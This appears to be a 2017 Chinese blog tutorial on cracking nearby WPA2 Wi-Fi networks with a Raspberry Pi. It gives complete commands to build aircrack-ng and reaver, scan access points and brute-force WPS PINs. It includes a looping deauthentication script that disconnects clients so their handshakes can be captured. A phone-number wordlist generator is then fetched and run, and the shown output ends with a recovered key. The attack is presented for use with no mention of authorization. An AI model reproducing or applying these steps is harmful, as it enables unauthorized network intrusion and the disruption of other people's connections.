树莓派破解Wi-Fi


作者:lingyun 来源:凌云物网智科实验室 时间:2017-08-09

编译安装

安装依赖包

sudo aptitude install build-essential libnl-3-200 libnl-3-dev libnl-genl-3-200 libnl-genl-3-dev libsqlite3-0 libsqlite3-dev libpcap0.8 libpcap-dev libpcap0.8-dev -y

安装aircrack-ng

wget https://coding.net/u/sfantree/p/self_use_OSS/git/raw/master/source/aircrack-ng-1.2-rc4.tar.gz
tar -zxvf aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
make -j
sudo make install DESTDIR=/usr/local/aircrack-ng

安装reaver

wget ftp://mirrors.ustc.edu.cn/gentoo/distfiles/reaver-1.4.tar.gz
cd reaver-1.4/src
./configure --prefix=/usr/local/reaver
make -j
sudo -p mkdir /usr/local/reaver/bin

添加环境变量

cat > /etc/profile.d/hackwifi.sh << EOF
export PATH=$PATH:/usr/local/reaver/bin:/usr/local/aircrack-ng/usr/local/bin:/usr/local/aircrack-ng/usr/local/sbin
EOF

扫描

将指定网卡设置为监听模式,网卡推荐使用8187或3070

ifconfig |grep wlan|awk '{print $1}'
sudo airmon-ng start wlan1
ifconfig|grep mon|awk '{print $1}'

扫描附近的所有热点

$ sudo airodump-ng wlan1mon

 CH  4 ][ Elapsed: 0 s ][ 2017-07-31 16:14                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 08:10:77:00:00:00  -59        2        0    0   6  54e  WPA2 CCMP   PSK  Netcore                     
 04:95:E6:00:00:00  -63        2        0    0   4  54e  WPA2 CCMP   PSK  Tenda              
 CC:81:DA:00:00:00  -63        3        0    0   3  54e. WPA2 CCMP   PSK  Mass

PIN穷举破解

利用wps漏洞,在最大尝试1.1w次以后可以得到WPA密码,成功率几乎100%,刚刚扫描的wifi列表里54e后面有点的表示开启了wps,可以通过此方法获取PIN码

sudo reaver -i wlan1mon -b CC:81:DA:00:00:00 -a -S -vv -d2 -t 5 -c 3

参数更详细的用法可以reaver -h查看帮助信息。

抓包破解

抓包应用更广泛,不过获取的握手包仅带有散列信息,仍然需要暴力运算匹配出相应密码

$ sudo airodump-ng --ivs --bssid FC:D7:33:00:00:00 -w hack.cap -c 9 wlan1mon

CH  9 ][ Elapsed: 36 s ][ 2017-07-31 18:09                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:00:00:00  -56   0       74      577    0   9  54e  WPA2 CCMP   PSK  Tenda   

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

 C8:3A:35:00:00:00  74:72:B0:00:00:00   -1   11e- 0      0      538                               
 C8:3A:35:00:00:00  50:C8:E5:00:00:00  -53    0 - 6    718      106

另外再打开一个终端窗口,发送Deauth数据包来中断客户端和热点的连接

#!/bin/bash
while ((1));do
    sudo aireplay-ng -0 3 -a C8:3A:35:00:00:00  -c 50:C8:E5:00:00:00 wlan1mon
    sleep 25
done

一般客户端会自动重新连接热点,连接认证过程的信息方便被airodump-ng抓取,保证这个过程不断重复,两次攻击保证有足够时间间隔,这里我就写了个shell循环

18:37:53  Waiting for beacon frame (BSSID: C8:3A:35:00:00:00) on channel 9
18:37:59  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 7| 0 ACKs]
18:38:00  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 5| 0 ACKs]
18:38:01  Sending 64 directed DeAuth. STMAC: [50:C8:E5:00:00:00] [ 0| 0 ACKs]

每一次攻击过后#Data的数值会不断增大,当获取到足够多的信息时(大概1.8k),airodump-ng界面右上角会显示WPA handshake就可以停止抓包

CH  9 ][ Elapsed: 11 mins ][ 2017-07-31 18:38 ][ WPA handshake: C8:3A:35:00:00:00             

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C8:3A:35:00:00:00  -65   0      823     2285    9   9  54e  WPA2 CCMP   PSK  Tenda    

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                       

 C8:3A:35:00:00:00  74:72:B0:00:00:00   -1   11e- 0      0      174                               
 C8:3A:35:00:00:00  50:C8:E5:00:00:00  -57    2e- 6     31    10935  Tenda          
 C8:3A:35:00:00:00  80:ED:2C:00:00:00  -63    1e- 1     17      264                               
 C8:3A:35:00:00:00  84:11:9E:00:00:00   -1    5e- 0      0        9

跑字典

通常目录下不止有一个cap文件,只有最后一个cap文件才保留着握手信息。拿到握手包后接着就是跑字典了,不建议在树莓派上跑,复制握手包到其他性能好的主机上。

aircrack-ng -w dict.txt Tenda.cap-05.ivs

我写了个脚本生成指定城市的手机号码,大城市的号段一般比较多,例如下面生成武汉市的手机号码的txt文件大小超200M

wget https://github.com/sfantree/mobile-password-dictionary/raw/master/phonedict.py
python phonedict.py
Please input the PinYing of your Province:hubei
Please input the PinYing of your City:wuhan

成果图,测试在腾讯云低配上1.8k/s的速度,一般矿工基本可以达到20w/s

                        Aircrack-ng 1.2 rc4

      [00:05:10] 550244/1189995 keys tested (1825.27 k/s) 

      Time left: 5 minutes, 50 seconds                          46.24%

                          KEY FOUND! [ 1388613xxxx ]


      Master Key     : 46 47 95 56 E4 69 8D 88 82 96 31 D2 56 37 1B D0 
                       3B 70 64 90 81 AF E5 65 61 BE 67 44 2A 7F 66 69 

      Transient Key  : B3 69 C5 3C E1 86 A6 DE 63 6B 68 D9 82 60 61 8B 
                       CB 01 42 8D 92 35 15 E2 38 EA 6D 55 93 FE 30 00 
                       9C 4B 5A 60 98 32 32 76 4C 2B A0 80 42 1A EE 68 
                       81 11 C9 3D 67 6A 60 B4 31 44 33 02 7C 68 80 4C 

      EAPOL HMAC     : A9 C0 66 3B 81 D6 62 1D 9D 09 3E C9 93 36 B3 45
在线咨询
微信号
13554373241
联系方式
135-5437-3241
邮箱
guowenxue@aliyun.com
返回顶部